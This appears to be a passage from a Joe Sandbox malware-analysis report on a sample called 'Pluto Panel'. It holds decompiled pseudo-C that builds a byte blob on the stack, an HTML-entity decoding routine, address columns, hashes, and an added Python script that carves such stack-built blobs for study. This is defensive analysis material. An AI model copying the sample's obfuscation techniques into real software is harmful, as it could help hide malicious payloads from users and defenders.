                                                                                                          					_v296 =  *((intOrPtr*)(_t219 + 0x18));
                                                                                                          					_v12 = 0x90;
                                                                                                          					_v300 =  *(_t219 + 2) & 0x0000ffff;
                                                                                                          					if(E00F1C860( &_v24,  &_v300,  &_v12, 0,  &_v288) != 0) {
                                                                                                          						L9:
                                                                                                          						_t184 = _v284;
                                                                                                          						if(_t184 != 0) {
                                                                                                          							E00F2118A(_v292 + 0x68,  &(_t184[4]),  *_t184 & 0x000000ff, 0);
                                                                                                          							_t184 =  *0x4430d8(_v284);
                                                                                                          						}
                                                                                                          						L11:
                                                                                                          						if(_v24 == 0) {
                                                                                                          							goto L13;
                                                                                                          						}
                                                                                                          						return  *0x443100(_v24);
                                                                                                          					}
                                                                                                          					_push(0x1c);
                                                                                                          					_push( &_v348);
                                                                                                          					_push( &_v152);
                                                                                                          					L00F5B575();
                                                                                                          					_v8 =  &_v280;
                                                                                                          					_v12 = 0x9b;
                                                                                                          					_t184 = E00F1C860( &_v24,  &_v300,  &_v12, 0,  &_v288);
                                                                                                          					if(_t184 == 0) {
                                                                                                          						goto L11;
                                                                                                          					}
                                                                                                          					goto L9;
                                                                                                          				}
                                                                                                          			}
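The statements above build a byte blob on the stack one `mov byte` at a time (`_v242 = 0xd;` through `_v153 = 0x91;`, with `_v231` filled from the temporary `_t184`) and then hand `&_v152` to two unnamed routines together with a constant copied from 0x4435b8; the listing does not say what those routines do with the blob. The script below is an added example for this page, not part of the Joe Sandbox output and not the sample's own code: it carves such stack-built blobs out of the decompiler text so they can be dumped and analysed separately. It assumes the decompiler's `_vN` means the slot at `[ebp - N]` (so a smaller N is a higher address) and that every slot assigned a one-byte literal is a single byte, since the text gives no slot widths; a slot assigned a temporary is kept as an unknown byte rather than guessed. The embedded input is a short excerpt copied from the listing above.

```python
"""Reconstruct byte blobs that a sample assembles on the stack byte by byte.

Added example for this report page; not Joe Sandbox output and not the
sample's own code.  Input is decompiler pseudo-C as in the listing above
(`_v242 = 0xd;`, `_v231 = _t184;`).  Assumptions: `_vN` is the stack slot
at [ebp - N], so a smaller N is a higher address, and a slot assigned a
one-byte literal is one byte (slot widths are not visible in the text).
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# One statement per line: `_vN = <value>;`  (the `(?!=)` keeps `==` out).
ASSIGN_RE = re.compile(r"^\s*_v(\d+)\s*=(?!=)\s*([^;]+?)\s*;\s*$")
# Decompiler temporaries such as `_t184`: register contents, value unknown.
TEMP_RE = re.compile(r"^_t\d+$")

# Excerpt copied from the listing above (slots _v235.._v228 and _v204.._v200),
# with the _push() statements between them left in to show they are ignored.
SAMPLE_LISTING = """
_v235 = 0x75;
_v234 = 6;
_v233 = 0x8b;
_v232 = 0x49;
_v231 = _t184;
_v230 = 0xdc;
_v229 = 0xf;
_v228 = 0x30;
_v204 = 0xe;
_v203 = 0x68;
_push(0x80);
_push(_t184);
_push( &_v152);
_v202 = 0x53;
_v201 = 0x77;
_v200 = 0x2f;
"""


@dataclass
class Blob:
    start_slot: int          # largest _vN in the run, i.e. the lowest address
    data: bytearray          # bytes in memory order; 0x00 where the value is unknown
    unknown: List[int] = field(default_factory=list)  # offsets filled from a temporary

    @property
    def end_slot(self) -> int:
        return self.start_slot - len(self.data) + 1

    def hexdump(self) -> str:
        """Hex bytes in memory order, '??' where the listing gave no literal."""
        return " ".join("??" if i in self.unknown else f"{b:02x}"
                        for i, b in enumerate(self.data))


def parse_slots(listing: str) -> Dict[int, Optional[int]]:
    """Map slot index -> byte value, or None when the slot came from a temporary.

    Non-assignment lines, and assignments whose value is neither a one-byte
    literal nor a temporary (pointers, loads, wide constants), are skipped.
    """
    slots: Dict[int, Optional[int]] = {}
    for line in listing.splitlines():
        m = ASSIGN_RE.match(line)
        if not m:
            continue
        slot, value = int(m.group(1)), m.group(2)
        if TEMP_RE.match(value):
            slots[slot] = None
            continue
        try:
            n = int(value, 0)        # accepts 0xd, 6, 0x8b, ...
        except ValueError:
            continue
        if 0 <= n <= 0xFF:
            slots[slot] = n
    return slots


def assemble(slots: Dict[int, Optional[int]]) -> List[Blob]:
    """Merge slots with consecutive indices into contiguous blobs, lowest address first."""
    blobs: List[Blob] = []
    for slot in sorted(slots, reverse=True):   # descending N == ascending address
        if blobs and blobs[-1].end_slot - 1 == slot:
            blob = blobs[-1]
        else:
            blob = Blob(start_slot=slot, data=bytearray())
            blobs.append(blob)
        value = slots[slot]
        if value is None:
            blob.unknown.append(len(blob.data))
            blob.data.append(0)
        else:
            blob.data.append(value)
    return blobs


def reconstruct(listing: str) -> List[Blob]:
    return assemble(parse_slots(listing))


if __name__ == "__main__":
    for blob in reconstruct(SAMPLE_LISTING):
        print(f"[ebp-{blob.start_slot}]..[ebp-{blob.end_slot}] {len(blob.data)} bytes, "
              f"{len(blob.unknown)} unknown: {blob.hexdump()}")
```

Run over the whole function above it reports the 90-byte run from [ebp-242] to [ebp-153] with one unknown byte at [ebp-231], plus a stray one-byte entry for `_v12`, which the parser cannot tell from a byte slot because the text gives no widths; the embedded excerpt is deliberately split into two runs to show how a gap is reported. What to do with the recovered bytes depends on what the two unnamed routines turn out to be, which this listing alone does not establish.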
Instruction addresses of the decompiled statements (the address column that extraction separated from the code; one entry per statement in listing order, with repeats and out-of-order values as in the original column):
0x00f1b1f8, 0x00f1b1fa, 0x00f1b1ff, 0x00f1b205, 0x00f1b208, 0x00f1b20d, 0x00f1b20e, 0x00f1b215,
0x00f1b21a, 0x00f1b22b, 0x00f1b22b, 0x00f1b233, 0x00f1b238, 0x00f1b23d, 0x00f1b23e, 0x00f1b247,
0x00f1b258, 0x00f1b258, 0x00f1b260, 0x00f1b265, 0x00f1b26a, 0x00f1b26b, 0x00f1b274, 0x00f1b285,
0x00f1b285, 0x00f1b28d, 0x00f1b292, 0x00f1b297, 0x00f1b298, 0x00f1b2a1, 0x00f1b744, 0x00f1b744,
0x00f1b2a7, 0x00f1b2a7, 0x00f1b2aa, 0x00f1b2ad, 0x00f1b2b0, 0x00f1b2b7, 0x00f1b2be, 0x00f1b2c5,
0x00f1b2cc, 0x00f1b2d3, 0x00f1b2da, 0x00f1b2e1, 0x00f1b2e8, 0x00f1b2ef, 0x00f1b2f6, 0x00f1b2fd,
0x00f1b304, 0x00f1b30b, 0x00f1b312, 0x00f1b319, 0x00f1b320, 0x00f1b327, 0x00f1b32e, 0x00f1b335,
0x00f1b33c, 0x00f1b343, 0x00f1b34a, 0x00f1b351, 0x00f1b358, 0x00f1b35f, 0x00f1b366, 0x00f1b36d,
0x00f1b374, 0x00f1b37b, 0x00f1b382, 0x00f1b389, 0x00f1b390, 0x00f1b397, 0x00f1b39e, 0x00f1b3a5,
0x00f1b3ac, 0x00f1b3b3, 0x00f1b3ba, 0x00f1b3c1, 0x00f1b3c8, 0x00f1b3cf, 0x00f1b3d6, 0x00f1b3dd,
0x00f1b3e4, 0x00f1b3eb, 0x00f1b3f2, 0x00f1b3f9, 0x00f1b400, 0x00f1b407, 0x00f1b40d, 0x00f1b414,
0x00f1b41b, 0x00f1b422, 0x00f1b429, 0x00f1b430, 0x00f1b437, 0x00f1b43e, 0x00f1b445, 0x00f1b44c,
0x00f1b453, 0x00f1b45a, 0x00f1b461, 0x00f1b468, 0x00f1b46f, 0x00f1b476, 0x00f1b47d, 0x00f1b484,
0x00f1b48b, 0x00f1b492, 0x00f1b499, 0x00f1b4a0, 0x00f1b4a7, 0x00f1b4ae, 0x00f1b4b5, 0x00f1b4bc,
0x00f1b4c3, 0x00f1b4ca, 0x00f1b4d1, 0x00f1b4d6, 0x00f1b4dd, 0x00f1b4de, 0x00f1b4e5, 0x00f1b4ec,
0x00f1b4f3, 0x00f1b4fa, 0x00f1b501, 0x00f1b508, 0x00f1b50f, 0x00f1b516, 0x00f1b51d, 0x00f1b524,
0x00f1b52b, 0x00f1b532, 0x00f1b539, 0x00f1b540, 0x00f1b547, 0x00f1b54e, 0x00f1b555, 0x00f1b55c,
0x00f1b563, 0x00f1b56a, 0x00f1b571, 0x00f1b578, 0x00f1b57f, 0x00f1b586, 0x00f1b58d, 0x00f1b594,
0x00f1b59b, 0x00f1b5a2, 0x00f1b5a9, 0x00f1b5b0, 0x00f1b5b7, 0x00f1b5be, 0x00f1b5c5, 0x00f1b5cc,
0x00f1b5d3, 0x00f1b5da, 0x00f1b5e1, 0x00f1b5e8, 0x00f1b5ef, 0x00f1b5f6, 0x00f1b5fd, 0x00f1b604,
0x00f1b60b, 0x00f1b612, 0x00f1b619, 0x00f1b620
                                                                                                          0x00f1b627
                                                                                                          0x00f1b62e
                                                                                                          0x00f1b635
                                                                                                          0x00f1b63c
                                                                                                          0x00f1b64c
                                                                                                          0x00f1b64d
                                                                                                          0x00f1b64e
                                                                                                          0x00f1b651
                                                                                                          0x00f1b652
                                                                                                          0x00f1b653
                                                                                                          0x00f1b65b
                                                                                                          0x00f1b65c
                                                                                                          0x00f1b66e
                                                                                                          0x00f1b66f
                                                                                                          0x00f1b671
                                                                                                          0x00f1b67c
                                                                                                          0x00f1b682
                                                                                                          0x00f1b68f
                                                                                                          0x00f1b696
                                                                                                          0x00f1b6bb
                                                                                                          0x00f1b704
                                                                                                          0x00f1b704
                                                                                                          0x00f1b70c
                                                                                                          0x00f1b720
                                                                                                          0x00f1b72b
                                                                                                          0x00f1b72b
                                                                                                          0x00f1b731
                                                                                                          0x00f1b735
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00f1b73a
                                                                                                          0x00f1b6bd
                                                                                                          0x00f1b6c5
                                                                                                          0x00f1b6cc
                                                                                                          0x00f1b6cd
                                                                                                          0x00f1b6db
                                                                                                          0x00f1b6f4
                                                                                                          0x00f1b6fb
                                                                                                          0x00f1b702
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00f1b702

Strings
Memory Dump Source
• Source File: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000005.00000002.701197443.0000000000F10000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.701947356.0000000000F92000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_Pluto Panel.jbxd
Yara matches
Similarity
• API ID:
• String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$F$H$H$I$K$K$L$O$S$X$\$^$`$a$b$g$h$n$n$q$t$t$t$u$u$w$y$y$z${$}$~
• API String ID: 0-140969752
• Opcode ID: dbe111918d2f51ba58f9ce5963b6dd4814b8b031a5b691b88f874b4955952eea
• Instruction ID: 0eb65e239be903c880f93dd7af2ebc0ca04ff590ace53d4ba6b4b3a30fe977bf
• Opcode Fuzzy Hash: dbe111918d2f51ba58f9ce5963b6dd4814b8b031a5b691b88f874b4955952eea
• Instruction Fuzzy Hash: 8BF1FE209087E9C9DB32C7788C097CDBE645B27324F0843D9E1E87A2D2D7B54BC59B66
Uniqueness

Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 80%
                                                                                                          			E00F7E67A(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                          				signed int _v8;
                                                                                                          				void* _v11;
                                                                                                          				char _v12;
                                                                                                          				char _v13;
                                                                                                          				char _v19;
                                                                                                          				char _v20;
                                                                                                          				char _v21;
                                                                                                          				char _v22;
                                                                                                          				char _v23;
                                                                                                          				char _v24;
                                                                                                          				signed int _v28;
                                                                                                          				short _v30;
                                                                                                          				char _v32;
                                                                                                          				intOrPtr _v36;
                                                                                                          				intOrPtr _v40;
                                                                                                          				intOrPtr _v44;
                                                                                                          				intOrPtr _v48;
                                                                                                          				intOrPtr _v52;
                                                                                                          				intOrPtr _v56;
                                                                                                          				intOrPtr _v60;
                                                                                                          				intOrPtr _v64;
                                                                                                          				char _v76;
                                                                                                          				char _v88;
                                                                                                          				intOrPtr _v92;
                                                                                                          				intOrPtr _v96;
                                                                                                          				intOrPtr _v100;
                                                                                                          				intOrPtr _v104;
                                                                                                          				intOrPtr _v108;
                                                                                                          				intOrPtr _v112;
                                                                                                          				intOrPtr _v116;
                                                                                                          				intOrPtr _v120;
                                                                                                          				intOrPtr _v124;
                                                                                                          				intOrPtr _v128;
                                                                                                          				intOrPtr _v132;
                                                                                                          				intOrPtr _v136;
                                                                                                          				intOrPtr _v140;
                                                                                                          				intOrPtr _v144;
                                                                                                          				intOrPtr _v148;
                                                                                                          				intOrPtr _v152;
                                                                                                          				intOrPtr _v156;
                                                                                                          				intOrPtr _v160;
                                                                                                          				intOrPtr _v164;
                                                                                                          				intOrPtr _v168;
                                                                                                          				intOrPtr _v172;
                                                                                                          				intOrPtr _v176;
                                                                                                          				intOrPtr _v180;
                                                                                                          				intOrPtr _v184;
                                                                                                          				intOrPtr _v188;
                                                                                                          				intOrPtr _v192;
                                                                                                          				intOrPtr _v196;
                                                                                                          				intOrPtr _v200;
                                                                                                          				intOrPtr _v204;
                                                                                                          				intOrPtr _v208;
                                                                                                          				intOrPtr _v212;
                                                                                                          				intOrPtr _v216;
                                                                                                          				intOrPtr _v220;
                                                                                                          				intOrPtr _v224;
                                                                                                          				intOrPtr _v228;
                                                                                                          				intOrPtr _v232;
                                                                                                          				intOrPtr _v236;
                                                                                                          				intOrPtr _v240;
                                                                                                          				intOrPtr _v244;
                                                                                                          				intOrPtr _v248;
                                                                                                          				intOrPtr _v252;
                                                                                                          				intOrPtr _v256;
                                                                                                          				intOrPtr _v260;
                                                                                                          				intOrPtr _v264;
                                                                                                          				intOrPtr _v268;
                                                                                                          				intOrPtr _v272;
                                                                                                          				intOrPtr _v276;
                                                                                                          				intOrPtr _v280;
                                                                                                          				intOrPtr _v284;
                                                                                                          				intOrPtr _v288;
                                                                                                          				intOrPtr _v292;
                                                                                                          				intOrPtr _v296;
                                                                                                          				intOrPtr _v300;
                                                                                                          				intOrPtr _v304;
                                                                                                          				intOrPtr _v308;
                                                                                                          				intOrPtr _v312;
                                                                                                          				intOrPtr _v316;
                                                                                                          				intOrPtr _v320;
                                                                                                          				intOrPtr _v324;
                                                                                                          				intOrPtr _v328;
                                                                                                          				intOrPtr _v332;
                                                                                                          				intOrPtr _v336;
                                                                                                          				intOrPtr _v340;
                                                                                                          				intOrPtr _v344;
                                                                                                          				intOrPtr _v348;
                                                                                                          				intOrPtr _v352;
                                                                                                          				intOrPtr _v356;
                                                                                                          				intOrPtr _v360;
                                                                                                          				intOrPtr _v364;
                                                                                                          				intOrPtr _v368;
                                                                                                          				intOrPtr _v372;
                                                                                                          				intOrPtr _v376;
                                                                                                          				intOrPtr _v380;
                                                                                                          				intOrPtr _v384;
                                                                                                          				intOrPtr _v388;
                                                                                                          				intOrPtr _v392;
                                                                                                          				intOrPtr _v396;
                                                                                                          				intOrPtr _v400;
                                                                                                          				intOrPtr _v404;
                                                                                                          				intOrPtr _v408;
                                                                                                          				intOrPtr _v412;
                                                                                                          				intOrPtr _v416;
                                                                                                          				intOrPtr _v420;
                                                                                                          				intOrPtr _v424;
                                                                                                          				intOrPtr _v428;
                                                                                                          				intOrPtr _v432;
                                                                                                          				intOrPtr _v436;
                                                                                                          				intOrPtr _v440;
                                                                                                          				intOrPtr _v444;
                                                                                                          				intOrPtr _v448;
                                                                                                          				intOrPtr _v452;
                                                                                                          				intOrPtr _v456;
                                                                                                          				intOrPtr _v460;
                                                                                                          				intOrPtr _v464;
                                                                                                          				intOrPtr _v468;
                                                                                                          				intOrPtr* _t200;
                                                                                                          				char* _t202;
                                                                                                          				signed int _t203;
                                                                                                          				intOrPtr _t207;
                                                                                                          				intOrPtr _t209;
                                                                                                          				intOrPtr _t212;
                                                                                                          				char _t215;
                                                                                                          				intOrPtr _t216;
                                                                                                          				short _t219;
                                                                                                          				signed int _t224;
                                                                                                          				intOrPtr* _t225;
                                                                                                          				intOrPtr _t230;
                                                                                                          				intOrPtr* _t231;
                                                                                                          				intOrPtr* _t233;
                                                                                                          				intOrPtr* _t238;
                                                                                                          				signed int _t239;
                                                                                                          				signed int _t242;
                                                                                                          				intOrPtr _t243;
                                                                                                          				intOrPtr* _t244;
                                                                                                          				signed int _t245;
                                                                                                          				void* _t247;
                                                                                                          				void* _t248;
                                                                                                          				void* _t249;
                                                                                                          
                                                                                                          				_v64 = 0x413f68;
                                                                                                          				_v60 = 0x413f70;
                                                                                                          				_v56 = 0x413f74;
                                                                                                          				_v52 = 0x413f78;
                                                                                                          				_v48 = 0x413f80;
                                                                                                          				_v44 = 0x413f88;
                                                                                                          				_v24 = 0x26;
                                                                                                          				_v23 = 0x3c;
                                                                                                          				_v22 = 0x3e;
                                                                                                          				_v21 = 0x22;
                                                                                                          				_v20 = 0x20;
                                                                                                          				_v19 = 0x27;
                                                                                                          				_v468 = 0x413f90;
                                                                                                          				_v464 = 0x413f98;
                                                                                                          				_v460 = 0x413fa0;
                                                                                                          				_v456 = 0x413fa8;
                                                                                                          				_v452 = 0x413fb0;
                                                                                                          				_v448 = 0x413fb8;
                                                                                                          				_v444 = 0x413fc0;
                                                                                                          				_v440 = 0x413fc8;
                                                                                                          				_v436 = 0x413fd0;
                                                                                                          				_v432 = 0x413fd8;
                                                                                                          				_v428 = 0x413fe0;
                                                                                                          				_v424 = 0x413fe8;
                                                                                                          				_v420 = 0x413ff0;
                                                                                                          				_v416 = 0x413ff8;
                                                                                                          				_v412 = 0x414000;
                                                                                                          				_v408 = 0x414008;
                                                                                                          				_v404 = 0x414010;
                                                                                                          				_v400 = 0x414018;
                                                                                                          				_v396 = 0x414020;
                                                                                                          				_v392 = 0x414028;
                                                                                                          				_v388 = 0x414030;
                                                                                                          				_v384 = 0x414038;
                                                                                                          				_v380 = 0x414040;
                                                                                                          				_v376 = 0x414048;
                                                                                                          				_v372 = 0x414050;
                                                                                                          				_v368 = 0x414058;
                                                                                                          				_v364 = 0x414060;
                                                                                                          				_v360 = 0x414068;
                                                                                                          				_v356 = 0x414070;
                                                                                                          				_v352 = 0x414078;
                                                                                                          				_v348 = 0x414080;
                                                                                                          				_v344 = 0x414088;
                                                                                                          				_v340 = 0x414090;
                                                                                                          				_v336 = 0x414098;
                                                                                                          				_v332 = 0x4140a0;
                                                                                                          				_v328 = 0x4140a8;
                                                                                                          				_v324 = 0x4140b0;
                                                                                                          				_v320 = 0x4140b8;
                                                                                                          				_v316 = 0x4140c0;
                                                                                                          				_v312 = 0x4140c8;
                                                                                                          				_v308 = 0x4140d0;
                                                                                                          				_v304 = 0x4140d8;
                                                                                                          				_v300 = 0x4140e0;
                                                                                                          				_v296 = 0x4140e8;
                                                                                                          				_v292 = 0x4140f0;
                                                                                                          				_v288 = 0x4140f8;
                                                                                                          				_v284 = 0x414100;
                                                                                                          				_v280 = 0x414108;
                                                                                                          				_v276 = 0x414110;
                                                                                                          				_v272 = 0x414118;
                                                                                                          				_v268 = 0x414120;
                                                                                                          				_v264 = 0x414128;
                                                                                                          				_v260 = 0x414130;
                                                                                                          				_v256 = 0x414138;
                                                                                                          				_v252 = 0x414140;
                                                                                                          				_v248 = 0x414148;
                                                                                                          				_v244 = 0x414150;
                                                                                                          				_v240 = 0x414158;
                                                                                                          				_v236 = 0x414160;
                                                                                                          				_v232 = 0x414168;
                                                                                                          				_v228 = 0x414170;
                                                                                                          				_v224 = 0x414178;
                                                                                                          				_v220 = 0x414180;
                                                                                                          				_v216 = 0x414188;
                                                                                                          				_v212 = 0x414190;
                                                                                                          				_v208 = 0x414198;
                                                                                                          				_v204 = 0x4141a0;
                                                                                                          				_t200 = _a8;
                                                                                                          				_v28 = _v28 | 0xffffffff;
                                                                                                          				_t224 = 0;
                                                                                                          				_t247 = 0;
                                                                                                          				_v200 = 0x4141a8;
                                                                                                          				_v196 = 0x4141b0;
                                                                                                          				_v192 = 0x4141b8;
                                                                                                          				_v188 = 0x4141c0;
                                                                                                          				_v184 = 0x4141c8;
                                                                                                          				_v180 = 0x4141d0;
                                                                                                          				_v176 = 0x4141d8;
                                                                                                          				_v172 = 0x4141e0;
                                                                                                          				_v168 = 0x4141e8;
                                                                                                          				_v164 = 0x4141f0;
                                                                                                          				_v160 = 0x4141f8;
                                                                                                          				_v156 = 0x414200;
                                                                                                          				_v152 = 0x414208;
                                                                                                          				_v148 = 0x414210;
                                                                                                          				_v144 = 0x414218;
                                                                                                          				_v140 = 0x414220;
                                                                                                          				_v136 = 0x414228;
                                                                                                          				_v132 = 0x414230;
                                                                                                          				_v128 = 0x414238;
                                                                                                          				_v124 = 0x414240;
                                                                                                          				_v120 = 0x414248;
                                                                                                          				_v116 = 0x414250;
                                                                                                          				_v112 = 0x414258;
                                                                                                          				_v108 = 0x414260;
                                                                                                          				_v104 = 0x414268;
                                                                                                          				_v100 = 0x414270;
                                                                                                          				_v96 = 0x414278;
                                                                                                          				_v92 = 0x414280;
                                                                                                          				if( *_t200 == 0) {
                                                                                                          					L45:
                                                                                                          					_t202 = _a4 + _t224;
                                                                                                          					 *_t202 = 0;
                                                                                                          					if(_a20 == 0 || _t224 <= 0 ||  *((char*)(_t202 - 1)) != 0x20) {
                                                                                                          						return _t202;
                                                                                                          					} else {
                                                                                                          						 *((char*)(_t202 - 1)) = 0;
                                                                                                          						return _t202;
                                                                                                          					}
                                                                                                          				}
                                                                                                          				while(_a12 == 0xffffffff || _a12 > _t247) {
                                                                                                          					_t225 = _t247 + _t200;
                                                                                                          					_t203 =  *_t225;
                                                                                                          					_v13 = _t203;
                                                                                                          					if(_t203 != 0x26) {
                                                                                                          						L33:
                                                                                                          						if(_a16 == 0 || _t203 > 0x20) {
                                                                                                          							 *((char*)(_t224 + _a4)) = _t203;
                                                                                                          							_t224 = _t224 + 1;
                                                                                                          						} else {
                                                                                                          							if(_t224 != _v28) {
                                                                                                          								 *((char*)(_t224 + _a4)) = 0x20;
                                                                                                          								_t224 = _t224 + 1;
                                                                                                          								if(_a20 != 0 && _t224 == 1) {
                                                                                                          									_t224 = 0;
                                                                                                          								}
                                                                                                          							}
                                                                                                          							_v28 = _t224;
                                                                                                          						}
                                                                                                          						_t247 = _t247 + 1;
                                                                                                          						L43:
                                                                                                          						_t200 = _a8;
                                                                                                          						if( *((char*)(_t247 + _t200)) != 0) {
                                                                                                          							continue;
                                                                                                          						}
                                                                                                          						break;
                                                                                                          					}
                                                                                                          					_t242 = 0;
                                                                                                          					_v36 = _t225 + 1;
                                                                                                          					while(1) {
                                                                                                          						_push( *((intOrPtr*)(_t248 + _t242 * 4 - 0x3c)));
                                                                                                          						L00F803B6();
                                                                                                          						_push(_t203);
                                                                                                          						_push( *((intOrPtr*)(_t248 + _t242 * 4 - 0x3c)));
                                                                                                          						_v8 = _t203;
                                                                                                          						_push(_v36);
                                                                                                          						L00F804AE();
                                                                                                          						_t249 = _t249 + 0x10;
                                                                                                          						if(_t203 == 0) {
                                                                                                          							break;
                                                                                                          						}
                                                                                                          						_t242 = _t242 + 1;
                                                                                                          						if(_t242 < 6) {
                                                                                                          							continue;
                                                                                                          						}
                                                                                                          						_t207 = _a8;
                                                                                                          						if( *((char*)(_t247 + _t207 + 1)) != 0x23) {
                                                                                                          							L29:
                                                                                                          							_v8 = _v8 & 0x00000000;
                                                                                                          							while(1) {
                                                                                                          								_t209 =  *((intOrPtr*)(_t248 + _v8 * 4 - 0x1d0));
                                                                                                          								_push(_t209);
                                                                                                          								_v40 = _t209;
                                                                                                          								L00F803B6();
                                                                                                          								_t243 = _t209;
                                                                                                          								_push(_t243);
                                                                                                          								_push(_v40);
                                                                                                          								_push(_v36);
                                                                                                          								L00F804AE();
                                                                                                          								_t249 = _t249 + 0x10;
                                                                                                          								if(_t209 == 0) {
                                                                                                          									break;
                                                                                                          								}
                                                                                                          								_v8 = _v8 + 1;
                                                                                                          								if(_v8 < 0x5f) {
                                                                                                          									continue;
                                                                                                          								}
                                                                                                          								_t203 = _v13;
                                                                                                          								goto L33;
                                                                                                          							}
                                                                                                          							 *((char*)(_t224 + _a4)) = _v8 - 0x5f;
                                                                                                          							_t224 = _t224 + 1;
                                                                                                          							_t247 = _t247 + _t243 + 1;
                                                                                                          							goto L43;
                                                                                                          						}
                                                                                                          						_t128 = _t207 + 2; // 0x2
                                                                                                          						_t244 = _t247 + _t128;
                                                                                                          						_t230 =  *_t244;
                                                                                                          						if(_t230 == 0x78 || _t230 == 0x58) {
                                                                                                          							_t159 = _t207 + 3; // 0x3
                                                                                                          							_t238 = _t247 + _t159;
                                                                                                          							_t231 = _t238;
                                                                                                          							_t245 = 0;
                                                                                                          							while(1) {
                                                                                                          								_t212 =  *_t231;
                                                                                                          								if(_t212 == 0) {
                                                                                                          									break;
                                                                                                          								}
                                                                                                          								if(_t212 == 0x3b) {
                                                                                                          									L27:
                                                                                                          									if(_t245 <= 0) {
                                                                                                          										goto L29;
                                                                                                          									}
                                                                                                          									_push(_t245);
                                                                                                          									_push(_t238);
                                                                                                          									_push( &_v88);
                                                                                                          									L00F8043C();
                                                                                                          									 *((char*)(_t248 + _t245 - 0x54)) = 0;
                                                                                                          									_t215 = E00F75384( &_v88,  &_v88);
                                                                                                          									_t249 = _t249 + 0x10;
                                                                                                          									 *((char*)(_t224 + _a4)) = _t215;
                                                                                                          									_t224 = _t224 + 1;
                                                                                                          									_t247 = _t247 + _t245 + 4;
                                                                                                          									goto L43;
                                                                                                          								}
                                                                                                          								_t245 = _t245 + 1;
                                                                                                          								if(_t245 >= 4) {
                                                                                                          									break;
                                                                                                          								}
                                                                                                          								_t231 = _t231 + 1;
                                                                                                          							}
                                                                                                          							_t245 = _t245 | 0xffffffff;
                                                                                                          							goto L27;
                                                                                                          						} else {
                                                                                                          							_t233 = _t244;
                                                                                                          							_t239 = 0;
                                                                                                          							while(1) {
                                                                                                          								_t216 =  *_t233;
                                                                                                          								if(_t216 == 0) {
                                                                                                          									break;
                                                                                                          								}
                                                                                                          								if(_t216 == 0x3b) {
                                                                                                          									_v8 = _t239;
                                                                                                          									L18:
                                                                                                          									if(_v8 <= 0) {
                                                                                                          										goto L29;
                                                                                                          									}
                                                                                                          									L00F8043C();
                                                                                                          									 *((char*)(_t248 + _v8 - 0x48)) = 0;
                                                                                                          									_t219 =  &_v76;
                                                                                                          									L00F80430();
                                                                                                          									_t249 = _t249 + 0x10;
                                                                                                          									_v32 = _t219;
                                                                                                          									_v12 = 0;
                                                                                                          									asm("stosb");
                                                                                                          									_v30 = 0;
                                                                                                          									 *0x4120d4(0, 0,  &_v32, 0xffffffff,  &_v12, 2, 0, 0, _t219,  &_v76, _t244, _v8);
                                                                                                          									 *((char*)(_t224 + _a4)) = _v12;
                                                                                                          									_t224 = _t224 + 1;
                                                                                                          									_t247 = _t247 + _v8 + 3;
                                                                                                          									goto L43;
                                                                                                          								}
                                                                                                          								_t239 = _t239 + 1;
                                                                                                          								if(_t239 >= 6) {
                                                                                                          									break;
                                                                                                          								}
                                                                                                          								_t233 = _t233 + 1;
                                                                                                          							}
                                                                                                          							_v8 = _v8 | 0xffffffff;
                                                                                                          							goto L18;
                                                                                                          						}
                                                                                                          					}
                                                                                                          					 *((char*)(_t224 + _a4)) =  *((intOrPtr*)(_t248 + _t242 - 0x14));
                                                                                                          					_t224 = _t224 + 1;
                                                                                                          					_t247 = _t247 + _v8 + 1;
                                                                                                          					goto L43;
                                                                                                          				}
                                                                                                          				goto L45;
                                                                                                          			}
                                                                                                          0x00f7e685
                                                                                                          0x00f7e68c
                                                                                                          0x00f7e693
                                                                                                          0x00f7e69a
                                                                                                          0x00f7e6a1
                                                                                                          0x00f7e6a8
                                                                                                          0x00f7e6af
                                                                                                          0x00f7e6b3
                                                                                                          0x00f7e6b7
                                                                                                          0x00f7e6bb
                                                                                                          0x00f7e6bf
                                                                                                          0x00f7e6c3
                                                                                                          0x00f7e6c7
                                                                                                          0x00f7e6d1
                                                                                                          0x00f7e6db
                                                                                                          0x00f7e6e5
                                                                                                          0x00f7e6ef
                                                                                                          0x00f7e6f9
                                                                                                          0x00f7e703
                                                                                                          0x00f7e70d
                                                                                                          0x00f7e717
                                                                                                          0x00f7e721
                                                                                                          0x00f7e72b
                                                                                                          0x00f7e735
                                                                                                          0x00f7e73f
                                                                                                          0x00f7e749
                                                                                                          0x00f7e753
                                                                                                          0x00f7e75d
                                                                                                          0x00f7e767
                                                                                                          0x00f7e771
                                                                                                          0x00f7e77b
                                                                                                          0x00f7e785
                                                                                                          0x00f7e78f
                                                                                                          0x00f7e799
                                                                                                          0x00f7e7a3
                                                                                                          0x00f7e7ad
                                                                                                          0x00f7e7b7
                                                                                                          0x00f7e7c1
                                                                                                          0x00f7e7cb
                                                                                                          0x00f7e7d5
                                                                                                          0x00f7e7df
                                                                                                          0x00f7e7e9
                                                                                                          0x00f7e7f3
                                                                                                          0x00f7e7fd
                                                                                                          0x00f7e807
                                                                                                          0x00f7e811
                                                                                                          0x00f7e81b
                                                                                                          0x00f7e825
                                                                                                          0x00f7e82f
                                                                                                          0x00f7e839
                                                                                                          0x00f7e843
                                                                                                          0x00f7e84d
                                                                                                          0x00f7e857
                                                                                                          0x00f7e861
                                                                                                          0x00f7e86b
                                                                                                          0x00f7e875
                                                                                                          0x00f7e87f
                                                                                                          0x00f7e889
                                                                                                          0x00f7e893
                                                                                                          0x00f7e89d
                                                                                                          0x00f7e8a7
                                                                                                          0x00f7e8b1
                                                                                                          0x00f7e8bb
                                                                                                          0x00f7e8c5
                                                                                                          0x00f7e8cf
                                                                                                          0x00f7e8d9
                                                                                                          0x00f7e8e3
                                                                                                          0x00f7e8ed
                                                                                                          0x00f7e8f7
                                                                                                          0x00f7e901
                                                                                                          0x00f7e90b
                                                                                                          0x00f7e915
